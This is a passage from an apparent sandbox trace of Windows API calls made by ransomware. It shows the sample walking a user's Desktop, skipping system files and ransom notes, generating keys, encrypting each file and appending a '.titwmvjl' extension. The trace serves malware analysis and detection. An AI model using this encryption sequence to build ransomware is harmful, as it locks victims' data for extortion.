nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0088.382] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.385] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.386] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.386] CloseHandle (hObject=0x2ac) returned 1 [0088.386] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\dbem3dR4dg5q7gd.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\dbem3dr4dg5q7gd.gif"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\dbem3dR4dg5q7gd.gif.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\dbem3dr4dg5q7gd.gif.titwmvjl"), dwFlags=0x1) returned 1 [0088.387] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.387] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0088.387] lstrcmpW (lpString1="DcpD3_p9.bmp", lpString2=".") returned 1 [0088.387] lstrcmpW (lpString1="DcpD3_p9.bmp", lpString2="..") returned 1 [0088.387] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="DcpD3_p9.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\DcpD3_p9.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\DcpD3_p9.bmp" [0088.387] lstrlenW (lpString=".titwmvjl") returned 9 [0088.387] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\DcpD3_p9.bmp") returned 42 [0088.387] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.388] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\DcpD3_p9.bmp.titwmvjl") returned 51 [0088.388] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\DcpD3_p9.bmp") returned 42 [0088.388] lstrlenW (lpString=".bmp") returned 4 [0088.388] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.388] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".bmp ") returned 5 [0088.388] lstrcmpiW (lpString1=".bmp", lpString2=".titwmvjl") returned -1 [0088.388] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.388] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\DcpD3_p9.bmp") returned 42 [0088.388] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\DcpD3_p9.bmp") returned 42 [0088.388] lstrcmpiW (lpString1="DcpD3_p9.bmp", lpString2="desktop.ini") returned -1 [0088.388] lstrcmpiW (lpString1="DcpD3_p9.bmp", lpString2="autorun.inf") returned 1 [0088.388] lstrcmpiW (lpString1="DcpD3_p9.bmp", lpString2="ntuser.dat") returned -1 [0088.388] lstrcmpiW (lpString1="DcpD3_p9.bmp", lpString2="iconcache.db") returned -1 [0088.388] lstrcmpiW (lpString1="DcpD3_p9.bmp", lpString2="bootsect.bak") returned 1 [0088.388] lstrcmpiW (lpString1="DcpD3_p9.bmp", lpString2="boot.ini") returned 1 [0088.388] lstrcmpiW (lpString1="DcpD3_p9.bmp", lpString2="ntuser.dat.log") returned -1 [0088.388] lstrcmpiW (lpString1="DcpD3_p9.bmp", lpString2="thumbs.db") returned -1 [0088.388] lstrcmpiW (lpString1="DcpD3_p9.bmp", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0088.388] lstrcmpiW (lpString1="DcpD3_p9.bmp", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0088.388] lstrcmpiW (lpString1="DcpD3_p9.bmp", lpString2="KRAB-DECRYPT.html") returned -1 [0088.388] lstrcmpiW (lpString1="DcpD3_p9.bmp", lpString2="CRAB-DECRYPT.html") returned 1 [0088.388] lstrcmpiW (lpString1="DcpD3_p9.bmp", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.388] lstrcmpiW (lpString1="DcpD3_p9.bmp", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.388] lstrcmpiW (lpString1="DcpD3_p9.bmp", lpString2="ntldr") returned -1 [0088.388] lstrcmpiW (lpString1="DcpD3_p9.bmp", lpString2="NTDETECT.COM") returned -1 [0088.388] lstrcmpiW (lpString1="DcpD3_p9.bmp", lpString2="Bootfont.bin") returned 1 [0088.388] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\DcpD3_p9.bmp") returned 42 [0088.388] lstrlenW (lpString=".bmp") returned 4 [0088.388] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.389] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".bmp ") returned 5 [0088.389] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.389] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.389] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\DcpD3_p9.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\dcpd3_p9.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0088.389] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.389] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0088.390] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.390] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.390] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0088.391] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.391] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.392] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.392] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0088.392] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.392] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.392] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.392] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.392] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0088.393] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.394] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.394] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.394] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0088.394] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.394] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.394] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.394] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.394] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0088.395] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.396] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5038f8) returned 1 [0088.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.396] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0088.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.396] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0088.396] GetLastError () returned 0x0 [0088.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.396] CryptDestroyKey (hKey=0x5038f8) returned 1 [0088.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.396] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.397] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.397] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0088.398] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.398] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503338) returned 1 [0088.398] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.398] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0088.398] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.398] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0088.398] GetLastError () returned 0x0 [0088.398] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.399] CryptDestroyKey (hKey=0x503338) returned 1 [0088.399] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.399] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.399] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0088.399] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0088.399] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x3370, lpOverlapped=0x0) returned 1 [0088.405] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffffcc90, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.405] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x3370, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x3370, lpOverlapped=0x0) returned 1 [0088.406] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.406] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0088.407] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.411] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.411] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.411] CloseHandle (hObject=0x2ac) returned 1 [0088.411] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\DcpD3_p9.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\dcpd3_p9.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\DcpD3_p9.bmp.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\dcpd3_p9.bmp.titwmvjl"), dwFlags=0x1) returned 1 [0088.412] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.412] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0088.412] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0088.412] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0088.412] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\desktop.ini" [0088.412] lstrlenW (lpString=".titwmvjl") returned 9 [0088.413] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\desktop.ini") returned 41 [0088.413] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.413] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\desktop.ini.titwmvjl") returned 50 [0088.413] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\desktop.ini") returned 41 [0088.413] lstrlenW (lpString=".ini") returned 4 [0088.413] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.413] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0088.413] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0088.413] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.413] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\desktop.ini") returned 41 [0088.413] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\desktop.ini") returned 41 [0088.413] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0088.413] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.413] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0088.413] lstrcmpW (lpString1="DmLPbKA PbBQzkgM.m4a", lpString2=".") returned 1 [0088.413] lstrcmpW (lpString1="DmLPbKA PbBQzkgM.m4a", lpString2="..") returned 1 [0088.413] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="DmLPbKA PbBQzkgM.m4a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\DmLPbKA PbBQzkgM.m4a") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\DmLPbKA PbBQzkgM.m4a" [0088.414] lstrlenW (lpString=".titwmvjl") returned 9 [0088.414] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\DmLPbKA PbBQzkgM.m4a") returned 50 [0088.414] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.414] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\DmLPbKA PbBQzkgM.m4a.titwmvjl") returned 59 [0088.414] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\DmLPbKA PbBQzkgM.m4a") returned 50 [0088.414] lstrlenW (lpString=".m4a") returned 4 [0088.414] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.414] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".m4a ") returned 5 [0088.414] lstrcmpiW (lpString1=".m4a", lpString2=".titwmvjl") returned -1 [0088.414] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.414] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\DmLPbKA PbBQzkgM.m4a") returned 50 [0088.414] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\DmLPbKA PbBQzkgM.m4a") returned 50 [0088.414] lstrcmpiW (lpString1="DmLPbKA PbBQzkgM.m4a", lpString2="desktop.ini") returned 1 [0088.414] lstrcmpiW (lpString1="DmLPbKA PbBQzkgM.m4a", lpString2="autorun.inf") returned 1 [0088.414] lstrcmpiW (lpString1="DmLPbKA PbBQzkgM.m4a", lpString2="ntuser.dat") returned -1 [0088.414] lstrcmpiW (lpString1="DmLPbKA PbBQzkgM.m4a", lpString2="iconcache.db") returned -1 [0088.414] lstrcmpiW (lpString1="DmLPbKA PbBQzkgM.m4a", lpString2="bootsect.bak") returned 1 [0088.414] lstrcmpiW (lpString1="DmLPbKA PbBQzkgM.m4a", lpString2="boot.ini") returned 1 [0088.414] lstrcmpiW (lpString1="DmLPbKA PbBQzkgM.m4a", lpString2="ntuser.dat.log") returned -1 [0088.414] lstrcmpiW (lpString1="DmLPbKA PbBQzkgM.m4a", lpString2="thumbs.db") returned -1 [0088.414] lstrcmpiW (lpString1="DmLPbKA PbBQzkgM.m4a", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0088.414] lstrcmpiW (lpString1="DmLPbKA PbBQzkgM.m4a", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0088.414] lstrcmpiW (lpString1="DmLPbKA PbBQzkgM.m4a", lpString2="KRAB-DECRYPT.html") returned -1 [0088.414] lstrcmpiW (lpString1="DmLPbKA PbBQzkgM.m4a", lpString2="CRAB-DECRYPT.html") returned 1 [0088.414] lstrcmpiW (lpString1="DmLPbKA PbBQzkgM.m4a", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.414] lstrcmpiW (lpString1="DmLPbKA PbBQzkgM.m4a", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.414] lstrcmpiW (lpString1="DmLPbKA PbBQzkgM.m4a", lpString2="ntldr") returned -1 [0088.414] lstrcmpiW (lpString1="DmLPbKA PbBQzkgM.m4a", lpString2="NTDETECT.COM") returned -1 [0088.415] lstrcmpiW (lpString1="DmLPbKA PbBQzkgM.m4a", lpString2="Bootfont.bin") returned 1 [0088.415] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\DmLPbKA PbBQzkgM.m4a") returned 50 [0088.415] lstrlenW (lpString=".m4a") returned 4 [0088.415] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.415] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".m4a ") returned 5 [0088.415] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.415] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.415] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\DmLPbKA PbBQzkgM.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\dmlpbka pbbqzkgm.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0088.415] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.416] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0088.416] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.416] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.416] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0088.418] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.418] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.418] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.418] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0088.418] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.418] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.418] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.418] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.418] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0088.419] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.420] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.420] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.420] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0088.420] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.420] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.420] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.420] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.420] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0088.421] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.422] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5031f8) returned 1 [0088.422] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.422] CryptGetKeyParam (in: hKey=0x5031f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0088.422] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.422] CryptEncrypt (in: hKey=0x5031f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0088.422] GetLastError () returned 0x0 [0088.422] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.422] CryptDestroyKey (hKey=0x5031f8) returned 1 [0088.422] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.422] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.423] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.423] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0088.424] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.424] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5036f8) returned 1 [0088.424] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.424] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0088.424] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.425] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0088.425] GetLastError () returned 0x0 [0088.425] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.425] CryptDestroyKey (hKey=0x5036f8) returned 1 [0088.425] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.425] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.425] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0088.425] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0088.426] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0xaee, lpOverlapped=0x0) returned 1 [0088.432] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffff512, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.432] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xaee, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0xaee, lpOverlapped=0x0) returned 1 [0088.433] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.433] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0088.434] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.438] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.438] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.438] CloseHandle (hObject=0x2ac) returned 1 [0088.439] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\DmLPbKA PbBQzkgM.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\dmlpbka pbbqzkgm.m4a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\DmLPbKA PbBQzkgM.m4a.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\dmlpbka 